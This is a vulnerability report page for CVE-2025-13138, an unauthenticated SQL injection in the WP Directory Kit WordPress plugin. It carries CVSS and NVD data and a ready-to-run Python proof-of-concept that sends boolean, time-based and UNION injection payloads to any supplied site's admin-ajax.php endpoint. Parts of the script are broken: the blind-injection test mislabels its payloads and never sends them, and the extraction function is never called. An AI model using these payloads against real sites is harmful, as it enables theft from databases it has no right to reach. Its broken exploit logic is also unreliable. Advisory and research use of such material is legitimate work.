Security Vulnerability Report
中文
CVE-2025-13138 CVSS 7.5 HIGH

CVE-2025-13138

Published: 2025-11-21 10:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'columns_search' parameter of the select_2_ajax() function in all versions up to, and including, 1.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Directory Kit <= 1.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13138 SQL Injection PoC # Target: WordPress with WP Directory Kit plugin <= 1.4.3 # Vulnerability: Unauthenticated SQL Injection via columns_search parameter def exploit_sqli(target_url, payload): """ Exploit SQL injection in WP Directory Kit plugin The vulnerability exists in select_2_ajax() function """ # Construct the AJAX endpoint endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Prepare the malicious request data = { 'action': 'wdk_select_2_ajax', 'columns_search': payload, 'table': 'wdk_settings', 'limit': 1 } try: response = requests.post(endpoint, data=data, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {str(e)}" def test_blind_sqli(target_url): """ Test for blind SQL injection vulnerability Using time-based blind injection technique """ # True condition - should respond quickly true_payload = "1' AND (SELECT 1 FROM (SELECT SLEEP(0))a) AND '1'='1" # False condition - should respond quickly (no delay) false_payload = "1' AND (SELECT 1 FROM (SELECT SLEEP(5))a) AND '1'='2" print(f"[*] Testing blind SQL injection on {target_url}") print(f"[*] True condition payload: {true_payload}") print(f"[*] False condition payload: {false_payload}") # Note: In a real attack, timing analysis would be performed here print("[*] Blind SQL injection test completed") def extract_database_info(target_url): """ Extract database information using UNION-based injection """ # Example UNION-based injection to extract database name union_payload = "1' UNION SELECT database()-- -" print(f"[*] Attempting to extract database information") result = exploit_sqli(target_url, union_payload) print(f"[*] Database info: {result[:200]}...") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13138.py <target_url>") print("Example: python cve-2025-13138.py http://example.com") sys.exit(1) target = sys.argv[1] # Test basic exploitation print("=" * 60) print("CVE-2025-13138 WP Directory Kit SQL Injection Exploit") print("=" * 60) # Basic test basic_payload = "1' OR '1'='1" print(f"[*] Sending basic test payload: {basic_payload}") result = exploit_sqli(target, basic_payload) print(f"[*] Response length: {len(result)} characters") # Test blind injection test_blind_sqli(target) print("\n[*] Exploitation complete") print("[*] Note: This is a proof-of-concept for educational purposes only")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13138", "sourceIdentifier": "[email protected]", "published": "2025-11-21T10:15:48.593", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'columns_search' parameter of the select_2_ajax() function in all versions up to, and including, 1.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpdirectorykit/tags/1.4.3/application/controllers/Wdk_frontendajax.php#L546", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/wpdirectorykit/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0cad8c48-5c96-484c-acda-b33d8d8d10d3?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.